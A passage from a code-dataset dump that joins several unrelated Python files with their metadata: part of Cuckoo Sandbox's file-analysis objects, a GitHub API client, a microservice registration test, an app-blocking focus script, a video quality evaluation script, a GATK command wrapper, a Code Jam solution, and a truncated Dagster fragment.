for url in re.findall(URL_REGEX, self.mmap(f.fileno())):\n if not is_safelisted_domain(url[1]):\n urls.add(\"\".join(url))\n return list(urls)\n\n def get_keys(self):\n \"\"\"Get any embedded plaintext public and/or private keys.\"\"\"\n if not os.path.getsize(self.file_path):\n return []\n\n f = open(self.file_path, \"rb\")\n return list(set(re.findall(PUBPRIVKEY, self.mmap(f.fileno()))))\n\n def get_all(self):\n \"\"\"Get all information available.\n @return: information dict.\n \"\"\"\n infos = {}\n infos[\"name\"] = self.get_name()\n infos[\"path\"] = self.file_path\n infos[\"size\"] = self.get_size()\n infos[\"crc32\"] = self.get_crc32()\n infos[\"md5\"] = self.get_md5()\n infos[\"sha1\"] = self.get_sha1()\n infos[\"sha256\"] = self.get_sha256()\n infos[\"sha512\"] = self.get_sha512()\n infos[\"ssdeep\"] = self.get_ssdeep()\n infos[\"type\"] = self.get_type()\n infos[\"yara\"] = self.get_yara()\n infos[\"urls\"] = self.get_urls()\n return infos\n\nclass Archive(object):\n def __init__(self, filepath):\n self.filepath = filepath\n self.z = zipfile.ZipFile(filepath)\n\n def get_file(self, filename):\n filepath = tempfile.mktemp()\n shutil.copyfileobj(self.z.open(filename), open(filepath, \"wb\"))\n return File(filepath, temporary=True)\n\nclass Buffer(object):\n \"\"\"A brief wrapper around string buffers for quick Yara rule matching.\"\"\"\n\n def __init__(self, buffer):\n self.buffer = buffer\n\n def get_yara_quick(self, category, externals=None):\n results, rule = [], File.yara_rules[category]\n for match in rule.match(data=self.buffer, externals=externals):\n results.append(match.rule)\n return results\n\nclass YaraMatch(object):\n def __init__(self, match, category=None):\n self.name = match[\"name\"]\n self.meta = match[\"meta\"]\n self._decoded = {}\n self.offsets = match[\"offsets\"]\n self.category = category\n\n self._strings = []\n for s in match[\"strings\"]:\n self._strings.append(s.decode(\"base64\"))\n\n def string(self, identifier, index=0):\n off, idx = 
self.offsets[identifier][index]\n return self._strings[idx]\n\n def strings(self, identifier):\n ret = []\n for off, idx in self.offsets[identifier]:\n ret.append(self._strings[idx])\n return ret\n\nclass ExtractedMatch(object):\n def __init__(self, match):\n self.category = match[\"category\"]\n self.program = match.get(\"program\")\n self.first_seen = match.get(\"first_seen\")\n self.pid = match.get(\"pid\")\n\n self.yara = []\n for ym in match[\"yara\"]:\n self.yara.append(YaraMatch(ym))\n\n # Raw payload.\n self.raw = match.get(\"raw\")\n self.info = match[\"info\"]\n", "repo_name": "cuckoosandbox/cuckoo", "sub_path": "cuckoo/common/objects.py", "file_name": "objects.py", "file_ext": "py", "file_size_in_byte": 14049, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5316, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "os.unlink", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 131, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 132, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 133, "usage_type": "call"}, {"api_name": "hashlib.sha512", "line_number": 134, "usage_type": "call"}, {"api_name": "binascii.crc32", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pydeep.hash_file", "line_number": 214, "usage_type": "call"}, {"api_name": "sflock.magic.from_file", "line_number": 222, "usage_type": "call"}, {"api_name": "sflock.magic", "line_number": 222, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "sflock.magic.from_file", "line_number": 230, "usage_type": "call"}, {"api_name": "sflock.magic", "line_number": 230, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pefile.PE", "line_number": 241, "usage_type": "call"}, {"api_name": "pefile.PE", "line_number": 258, "usage_type": "call"}, {"api_name": "androguard.core.bytecodes.apk.APK", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "{'APK': 'androguard.core.bytecodes.apk.APK'}.yara_rules", "line_number": 333, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 337, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 343, "usage_type": "call"}, {"api_name": "mmap.PROT_READ", "line_number": 362, "usage_type": "attribute"}, {"api_name": "mmap.ACCESS_READ", 
"line_number": 364, "usage_type": "attribute"}, {"api_name": "mmap.mmap", "line_number": 371, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 375, "usage_type": "call"}, {"api_name": "os.path", "line_number": 375, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 380, "usage_type": "call"}, {"api_name": "cuckoo.common.safelist.is_safelisted_domain", "line_number": 381, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 387, "usage_type": "call"}, {"api_name": "os.path", "line_number": 387, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 391, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 415, "usage_type": "call"}, {"api_name": "tempfile.mktemp", "line_number": 418, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 419, "usage_type": "call"}, {"api_name": "{'APK': 'androguard.core.bytecodes.apk.APK'}", "line_number": 420, "usage_type": "call"}, {"api_name": "{'APK': 'androguard.core.bytecodes.apk.APK'}.yara_rules", "line_number": 429, "usage_type": "attribute"}]} +{"seq_id": "26910775107", "text": "import requests\nimport json\nclass Github:\n def __init__(self):\n self.api_url=\"https://api.github.com\"\n \n def getUser(self,username):\n response=requests.get(self.api_url+'/users/'+username)\n return response.json()\n def getRepositories(self,username):\n response= requests.get(self.api_url+'/users/'+username+'/repos')\n return response.json()\n \ngithub=Github()\nwhile(True):\n secim=input(\"1-Find User\\n2-Get Repositories\\n3-Create Repository\\n4-Exit\\nSecim: \");\n if secim==4:\n break\n else:\n if secim==\"1\":\n username=input(\"Username: \")\n result=github.getUser(username)\n print(f\"name:{result['name']} public repos:{result['public_repos']} follower : {result['followers']}\")\n elif secim==\"2\":\n username=input('username: ')\n result=github.getRepositories(username)\n for repo in result:\n print(repo['name'])\n elif secim==\"3\":\n pass\n else:\n print(\"Yanlış seçim..\")\n\n", "repo_name": "hilal-bstn/PythonModules", "sub_path": "RequestsModuleUygulama2/RequestsModuleUygulama2.py", "file_name": "RequestsModuleUygulama2.py", "file_ext": "py", "file_size_in_byte": 1058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "35181497400", "text": "import os\n\nimport pytest\nimport requests_mock\n\nimport CTRegisterMicroserviceFlask\n\n\n@pytest.fixture\ndef validate_env():\n if not os.getenv('CT_URL'):\n raise Exception('CT_URL needs to be set')\n if not os.getenv('CT_TOKEN'):\n raise Exception('CT_TOKEN needs to be set')\n\n\n@requests_mock.mock(kw='mocker')\ndef test_microservice_register(mocker):\n post_calls = mocker.post(os.getenv('CT_URL') + '/api/v1/microservice', status_code=204)\n\n CTRegisterMicroserviceFlask.ct_register('test app', os.getenv('CT_URL'), 'http://local-url.com', True)\n\n assert post_calls.call_count == 1\n assert post_calls.called\n assert post_calls.last_request.text == '{\"name\": \"test app\", \"url\": \"http://local-url.com\", \"active\": true}'\n", "repo_name": "Skydipper/ct-register-microservice-python-flask", "sub_path": "CTRegisterMicroserviceFlask/tests/register_microservice_tests.py", "file_name": "register_microservice_tests.py", "file_ext": "py", "file_size_in_byte": 744, "program_lang": "python", 
"lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 19, "usage_type": "call"}, {"api_name": "CTRegisterMicroserviceFlask.ct_register", "line_number": 21, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 21, "usage_type": "call"}, {"api_name": "requests_mock.mock", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "14405997937", "text": "import psutil\nimport os\nimport keyboard\nfrom datetime import datetime\nimport time\n\nbanned_apps = []\nrunning = True\n\nptr_start = 0\n\npath = input(\"Enter the txt file of all your banned apps: \")\n\n#getting our pause time so we don't die\nprint(\"\\nEnter the pause time, in SECONDS, per cycle\")\nprint(\"This will have a major effect on cpu usage (must be 5 or greater) seconds\")\nprint(\"The greater the pause time the less cpu power will be used\")\nprint(\"5 is the lowest amount of pause time\")\npause_time = int(input(\"Enter pause time\\n>>> \"))\n\n#if they don't set a pause step then we force one so their computer doesnt die\nif pause_time < 5:\n pause_time = 5\n\n#reading the file and putting it into a stirng\nban_file = open(path,\"r\")\nbanned_apps_string = ban_file.read()\nban_file.close()\n\n#checking if their a \\n escape sequence at the end of the file so everything stays constent\nif banned_apps_string[len(banned_apps_string)-1]!='\\n':\n banned_apps_string+='\\n'\n\n#parsing and reading the banned apps file\nfor ptr_end in range(len(banned_apps_string)):\n if banned_apps_string[ptr_end]=='\\n':\n app_name = banned_apps_string[ptr_start: ptr_end]\n ptr_start = ptr_end+1\n\n banned_apps.append(app_name)\n\ntime_start = datetime.now().strftime(\"%H:%M:%S\")\nprint(\"Spam W to end Deep Work mode\")\nprint(\"Start Time: \", time_start)\n\n#life time loop\nwhile running:\n if keyboard.is_pressed('w'):\n running = False\n break\n \n time.sleep(pause_time)\n\n print(\"Running Scan [REMINDER]: spam W to exit. 
If you wish\")\n for i in range(len(banned_apps)):\n if banned_apps[i] in (i.name() for i in psutil.process_iter()):\n print(\"You are supposed to be in deep work rn\")\n os.system('taskkill /f /im '+banned_apps[i]) \n\n#printing final information\nprint(\"Deep Work is over\")\nprint(\"Start Time: \", time_start)\nprint(\"End Time: \", datetime.now().strftime(\"%H:%M:%S\"))\n\ninput(\">>>\")\n", "repo_name": "MiniJ147/banned_app_checker", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "name"}, {"api_name": "keyboard.is_pressed", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "psutil.process_iter", "line_number": 56, "usage_type": "call"}, {"api_name": "os.system", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "27898887426", "text": "import argparse\nfrom datetime import datetime\nimport os\nimport common\nimport sys\nimport torch\nimport itertools\nimport shutil\nimport numpy as np\nimport json\nfrom data.dnn.model import build\nfrom shutil import copyfile\nimport data.anchor.libvpx as libvpx\nfrom data.video.utility import profile_video, find_video\n\n\nclass Summary:\n def __init__(self, args):\n # dataset\n self.vpxdec_path = args.vpxdec_path\n self.data_dir = args.data_dir\n self.video_dataset = args.video_dataset\n self.dnn_dataset = args.video_dataset\n self.video_type = args.video_type\n self.dnn_type = args.dnn_type\n\n # codec\n self.skip = 0\n self.limit = args.total_length\n self.postfix = 's{}_l{}'.format(self.skip, self.limit)\n\n # test\n self.avg_anchors = args.avg_anchors\n self.epoch_length = args.epoch_length\n self.num_epochs = int(args.total_length / self.epoch_length)\n self.algorithm = args.algorithm\n\n def _validate(self, content, algorithm, num_epochs, epoch_length, avg_anchors):\n # set a video, a model, a cache profile\n content_dir = os.path.join(self.data_dir, content)\n lr_video_name = find_video(os.path.join(content_dir, 'video'), self.video_dataset.input_resolution)\n model = build(args.dnn_dataset)\n cache_profile_name = common.get_log_name(self.video_dataset.names, algorithm, num_epochs, epoch_length, avg_anchors)\n\n # validate\n json_path = os.path.join(content_dir, 'profile', lr_video_name, '{}.json'.format(cache_profile_name))\n with open(json_path, 'r') as json_file:\n json_data = json.load(json_file)\n anchors = json_data['frames']\n\n log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, cache_profile_name, 'metadata.txt')\n num_anchors = 0\n idx = 0\n with open(log_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().split('\\t')\n is_anchor = int(line[2])\n video_index, super_index = int(line[0]), int(line[1])\n if is_anchor == 1:\n if '{}.{}'.format(video_index, super_index) == anchors[idx]:\n idx += 1\n else:\n raise RuntimeError('{} != {}.{}'.format(anchors[idx], video_index, super_index))\n\n def _load_quality(self, content, algorithm, num_epochs, epoch_length, avg_anchors):\n # set a video, a model, a cache profile\n content_dir = 
os.path.join(self.data_dir, content)\n lr_video_name = find_video(os.path.join(content_dir, 'video'), self.video_dataset.input_resolution)\n model = build(args.dnn_dataset)\n cache_profile_name = common.get_log_name(self.video_dataset.names, algorithm, num_epochs, epoch_length, avg_anchors)\n\n bilinear_log_path = os.path.join(content_dir, 'log', lr_video_name, self.postfix, 'quality.txt')\n cache_log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, cache_profile_name, 'quality.txt')\n sr_log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, 'quality.txt')\n\n psnr_gains = []\n psnr_margins = []\n with open(bilinear_log_path, 'r') as f1, open(cache_log_path, 'r') as f2, open(sr_log_path, 'r') as f3:\n lines1, lines2, lines3 = f1.readlines(), f2.readlines(), f3.readlines()\n for line1, line2, line3 in zip(lines1, lines2, lines3):\n bilinear_psnr = float(line1.strip().split('\\t')[1])\n cache_psnr = float(line2.strip().split('\\t')[1])\n sr_psnr = float(line3.strip().split('\\t')[1])\n psnr_gain = cache_psnr - bilinear_psnr\n psnr_margin = sr_psnr - cache_psnr\n # TODO: add else\n psnr_gains.append(psnr_gain)\n psnr_margins.append(psnr_margin)\n\n\n log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, cache_profile_name, 'metadata.txt')\n num_anchors = 0\n with open(log_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().split('\\t')\n if int(line[2]) == 1:\n num_anchors += 1\n print(content, algorithm, avg_anchors, num_anchors)\n\n return psnr_gains, psnr_margins\n\n def _load_metadata(self, content, algorithm, num_epochs, epoch_length, avg_anchors):\n # set a video, a model, a cache profile\n content_dir = os.path.join(self.data_dir, content)\n lr_video_name = find_video(os.path.join(content_dir, 'video'), self.video_dataset.input_resolution)\n model = build(args.dnn_dataset)\n cache_profile_name = common.get_log_name(self.video_dataset.names, algorithm, num_epochs, epoch_length, avg_anchors)\n\n log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, cache_profile_name, 'metadata.txt')\n num_anchors = 0\n num_frames = 0\n with open(log_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().split('\\t')\n num_frames += 1\n if int(line[2]) == 1:\n num_anchors += 1\n\n return num_anchors, num_frames\n\n # TODO: validate a log using multiple contents\n def run(self):\n date_time = datetime.now().strftime('%m-%d-%Y')\n log_dir = os.path.join(self.data_dir, 'evaluation', date_time, self.video_type, self.dnn_type)\n os.makedirs(log_dir, exist_ok=True)\n\n for algorithm in args.algorithm:\n psnr_gains = {}\n psnr_margins = {}\n num_anchors = {}\n num_frames = {}\n for content in self.video_dataset.names:\n psnr_gains[content] = {}\n psnr_margins[content] = {}\n num_anchors[content] = {}\n num_frames[content] = {}\n psnr_gains['all'] = {}\n psnr_margins['all'] = {}\n for content in self.video_dataset.names:\n for avg_anchors in args.avg_anchors:\n psnr_gains[content][avg_anchors], psnr_margins[content][avg_anchors] = self._load_quality(content, algorithm, self.num_epochs, self.epoch_length, avg_anchors)\n num_anchors[content][avg_anchors], num_frames[content][avg_anchors] = self._load_metadata(content, algorithm, self.num_epochs, self.epoch_length, avg_anchors)\n if avg_anchors not in psnr_gains['all']:\n psnr_gains['all'][avg_anchors], psnr_margins['all'][avg_anchors] = self._load_quality(content, algorithm, 
self.num_epochs, self.epoch_length, avg_anchors)\n else:\n gain, margin = self._load_quality(content, algorithm, self.num_epochs, self.epoch_length, avg_anchors)\n psnr_gains['all'][avg_anchors] += gain\n psnr_margins['all'][avg_anchors] += margin\n \n log_path = os.path.join(log_dir, 'gain_{}.txt'.format(algorithm))\n with open(log_path, 'w') as f:\n # avg\n for content in self.video_dataset.names:\n f.write('{}\\t'.format(content))\n for avg_anchors in args.avg_anchors:\n f.write('{:.4f}\\t'.format(np.average(psnr_gains[content][avg_anchors])))\n f.write('\\n') \n f.write('all\\t')\n for avg_anchors in args.avg_anchors:\n f.write('{:.4f}\\t'.format(np.average(psnr_gains['all'][avg_anchors])))\n f.write('\\n') \n\n log_path = os.path.join(log_dir, 'margin_{}.txt'.format(algorithm))\n with open(log_path, 'w') as f:\n # avg\n for content in self.video_dataset.names:\n f.write('{}\\t'.format(content))\n for avg_anchors in args.avg_anchors:\n f.write('{:.4f}\\t'.format(np.average(psnr_margins[content][avg_anchors])))\n f.write('\\n') \n f.write('all\\t')\n for avg_anchors in args.avg_anchors:\n f.write('{:.4f}\\t'.format(np.average(psnr_margins['all'][avg_anchors])))\n f.write('\\n') \n\n log_path = os.path.join(log_dir, 'fraction_{}.txt'.format(algorithm))\n with open(log_path, 'w') as f:\n # avg\n for content in self.video_dataset.names:\n f.write('{}\\t'.format(content))\n for avg_anchors in args.avg_anchors:\n fraction = num_anchors[content][avg_anchors] / num_frames[content][avg_anchors] * 100\n f.write('{:.4f}\\t'.format(fraction))\n f.write('\\n')\n\n # 90%-tile\n # values = {}\n # for avg_anchors in args.avg_anchors:\n # values[avg_anchors] = []\n # for content in self.video_dataset.names:\n # f.write('{}\\t'.format(content))\n # for avg_anchors in args.avg_anchors:\n # value = np.percentile(psnr_gains[content][avg_anchors], 10)\n # values[avg_anchors].append(value)\n # f.write('{:.4f}\\t'.format(value))\n # f.write('\\n') \n # f.write('all\\t')\n # for avg_anchors in args.avg_anchors:\n # #f.write('{:.4f}\\t'.format(np.percentile(psnr_gains['all'][avg_anchors], 10)))\n # f.write('{:.4f}\\t'.format(np.average(values[avg_anchors])))\n # f.write('\\n') \n\n # 95%-tile\n # values = {}\n # for avg_anchors in args.avg_anchors:\n # values[avg_anchors] = []\n # for content in self.video_dataset.names:\n # f.write('{}\\t'.format(content))\n # for avg_anchors in args.avg_anchors:\n # value = np.percentile(psnr_gains[content][avg_anchors], 5)\n # values[avg_anchors].append(value)\n # f.write('{:.4f}\\t'.format(value))\n # f.write('\\n') \n # f.write('all\\t')\n # for avg_anchors in args.avg_anchors:\n # #f.write('{:.4f}\\t'.format(np.percentile(psnr_gains['all'][avg_anchors], 10)))\n # f.write('{:.4f}\\t'.format(np.average(values[avg_anchors])))\n # f.write('\\n') \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n # directory, path\n parser.add_argument('--vpxdec_path', type=str, default=None)\n parser.add_argument('--data_dir', type=str, required=True)\n parser.add_argument('--video_type', type=str, required=True)\n parser.add_argument('--dnn_type', type=str, required=True)\n \n args = parser.parse_args()\n \n # set default parameters\n if args.vpxdec_path is None:\n args.vpxdec_path = os.path.join(os.environ['ENGORGIO_CODE_ROOT'], 'third_party', 'libvpx-nemo', 'bin', 'vpxdec_nemo_ver2')\n assert(os.path.exists(args.vpxdec_path))\n\n # set an evaluation setting\n #args.avg_anchors = [1, 2, 4, 8]\n args.avg_anchors = [2, 4, 8, 16]\n args.epoch_length = 80\n 
args.total_length = 2000\n # args.algorithm = ['engorgio', 'uniform', 'engorgio_baseline']\n args.algorithm = ['engorgio', 'uniform', 'nemo']\n #args.algorithm = ['engorgio', 'engorgio_baseline']\n args.video_dataset = common.video_datasets[args.video_type]\n args.dnn_dataset = common.dnn_datasets[args.dnn_type]\n\n # run evaluation\n summary = Summary(args)\n summary.run()\n\n", "repo_name": "kaist-ina/neuroscaler-public", "sub_path": "data/anchor/multi_stream/summary.py", "file_name": "summary.py", "file_ext": "py", "file_size_in_byte": 11937, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "data.video.utility.find_video", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "data.dnn.model.build", "line_number": 42, "usage_type": "call"}, {"api_name": "common.get_log_name", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "data.video.utility.find_video", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "data.dnn.model.build", "line_number": 70, "usage_type": "call"}, {"api_name": "common.get_log_name", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "data.video.utility.find_video", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "data.dnn.model.build", "line_number": 108, "usage_type": "call"}, {"api_name": "common.get_log_name", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 126, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 236, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 237, "usage_type": "attribute"}, {"api_name": "common.video_datasets", "line_number": 247, "usage_type": "attribute"}, {"api_name": "common.dnn_datasets", "line_number": 248, "usage_type": "attribute"}]} +{"seq_id": "42402794322", "text": "from Bio.Application import _Option, _StaticArgument\nfrom Bio.Application import AbstractCommandline\n\n\nclass FilterMutectCallsCommandline(AbstractCommandline):\n '''\n\ttext\n\t'''\n\n def __init__(self, cmd=\"gatk\", **kwargs):\n self.program_name = cmd\n self.parameters = [\n _StaticArgument(\"FilterMutectCalls\"),\n _Option(\n [\"-V\", \"V\"],\n \"A VCF file containing variants\",\n filename=True,\n is_required=True,\n equate=False\n ),\n _Option(\n [\"-O\", \"O\"],\n \"The output filtered VCF file\",\n is_required=True,\n filename=True,\n equate=False\n ),\n _Option(\n [\"-R\", \"R\"],\n \"Reference sequence file\",\n is_required=True,\n filename=True,\n equate=False\n ),\n _Option(\n [\"--contamination-table\",\n \"contamination\"],\n \"Tables containing contamination information.\",\n filename=True,\n equate=False\n ),\n _Option(\n [\"-ob-priors\", \"ob_priors\"],\n \"One or more .tar.gz files \\n\" +\n \"containing tables of prior artifact probabilities \\n\" +\n \"for the read orientation filter model, \\n\" +\n \"one table per tumor sample\",\n filename=True,\n equate=False\n ),\n _Option(\n [\"--min-allele-fraction\",\n \"min_allele_fraction\"],\n \"Minimum allele fraction required\",\n equate=False\n ),\n _Option(\n [\"--java-options\", \"java_options\"],\n \"set config for java\",\n equate=False\n ),\n ]\n AbstractCommandline.__init__(self, cmd, **kwargs)\n", "repo_name": "XSLiuLab/Seq2Neo", "sub_path": "seq2neo/function/Mutation_Calling/_filtermutectcalls.py", "file_name": "_filtermutectcalls.py", "file_ext": "py", "file_size_in_byte": 1986, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Bio.Application.AbstractCommandline", "line_number": 5, "usage_type": "name"}, {"api_name": "Bio.Application._StaticArgument", "line_number": 13, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 14, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 
21, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 28, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 35, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 42, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 51, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 57, "usage_type": "call"}, {"api_name": "Bio.Application.AbstractCommandline.__init__", "line_number": 63, "usage_type": "call"}, {"api_name": "Bio.Application.AbstractCommandline", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "23620754461", "text": "from functools import partial\nfrom itertools import permutations, combinations\nfrom operator import xor\n\nlog = open('log.txt', 'w')\n\ndef writeLog(s):\n pass\n #writeLog(s)\n \ndef memoize(f, cache={}):\n def g(*args, **kwargs):\n key = (f, tuple(args), frozenset(kwargs.items()))\n if key not in cache:\n cache[key] = f(*args, **kwargs)\n return cache[key]\n return g\n\ndef recursive_sum(nested_num_list): \n if len(nested_num_list) == 1:\n return nested_num_list[0]\n return nested_num_list[0] + recursive_sum(nested_num_list[1:])\n\ndef recursive_xor(nested_num_list): \n if len(nested_num_list) == 1:\n return nested_num_list[0]\n return nested_num_list[0] ^ recursive_xor(nested_num_list[1:])\n\n#mreduce = memoize(recursive_xor)\nmreduce = memoize(partial(reduce, xor))\nmsum = memoize(sum)\n \nif __name__=='__main__': \n input_file = open('C-small-0.in', 'r')\n output_file = open('C-small-0.out', 'w')\n \n for line_num, line in enumerate(input_file.readlines()[2::2]):\n candy = map(int, line.split())\n max_sum = -1\n for i in range(1, len(candy)):\n c = combinations(candy, i)\n for i in c:\n i = i\n otherlist = list(candy)\n for b in i:\n otherlist.remove(b)\n writeLog( (i, otherlist))\n XORer, summer = reduce(xor, i), sum(otherlist)\n if XORer == summer:\n sumOfP = sum(i)\n if max_sum < sumOfP:\n max_sum = sumOfP\n \n if max_sum==-1:\n candy_value='NO'\n else:\n candy_value=str(max_sum)\n print >>output_file,'Case #%s: %s' % (line_num+1, str(candy_value))#>>output_file, \n log.close()\n input_file.close()\n output_file.close()\n", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_76/526.py", "file_name": "526.py", "file_ext": "py", "file_size_in_byte": 1868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "functools.partial", "line_number": 30, "usage_type": "call"}, {"api_name": "operator.xor", "line_number": 30, "usage_type": "argument"}, {"api_name": "itertools.combinations", "line_number": 41, "usage_type": "call"}, {"api_name": "operator.xor", "line_number": 48, "usage_type": "argument"}]} +{"seq_id": "29299675208", "text": "from typing import Generator, List\nfrom elx import Runner\nfrom dagster import (\n AssetsDefinition,\n Nothing,\n OpExecutionContext,\n Output,\n multi_asset,\n AssetOut,\n get_dagster_logger,\n)\nfrom elx.extensions.dagster.utils import 